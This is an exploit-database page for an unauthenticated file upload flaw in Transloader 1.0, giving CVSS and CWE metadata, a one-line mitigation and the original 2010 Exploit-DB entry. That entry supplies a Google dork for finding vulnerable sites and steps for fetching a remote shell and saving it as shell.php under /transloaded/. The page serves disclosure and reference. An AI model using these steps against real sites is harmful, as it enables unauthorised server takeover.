header-logo
Suggest Exploit
vendor:
Transloader
by:
DigitALL
8,8
CVSS
HIGH
Unauthenticated File Upload
434
CWE
Product Name: Transloader
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: CVE-2010-0456
CPE: a:somik:transloader
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

Translod Script Uplaod Vulnerability

Transloader Script is vulnerable to unauthenticated file upload. An attacker can upload a malicious file to the server without authentication.

Mitigation:

The application should validate the file type before uploading it to the server.
Source

Exploit-DB raw data:

# Exploit Title: Translod Script Uplaod Vulnerability

# Date: 16.01.2010

# Author: DigitALL

# Web Site : www.digitallsecurity.org<http://www.digitallsecurity.org>

# Thanks : Zombie KroNickq NoFearx38 And All 1923Turk.Com Members

# Software Link: http://somik.org/requests/transloader.zip

# Version: 1.0

# Code :

Google Dork: "Transloader by Somik.org" or "Transloader by" or "Transloder"  etc etc

From (http://): Your Shell Link (Example http://www.digitallsecurity.org/dosyalar/xx.txt)

To (filename): Shell Name (Example: shell.php)

And Submit Form.Your Shell Upload a /transloaded/shell.php

Navigation

Suggest Exploit

Services By CQR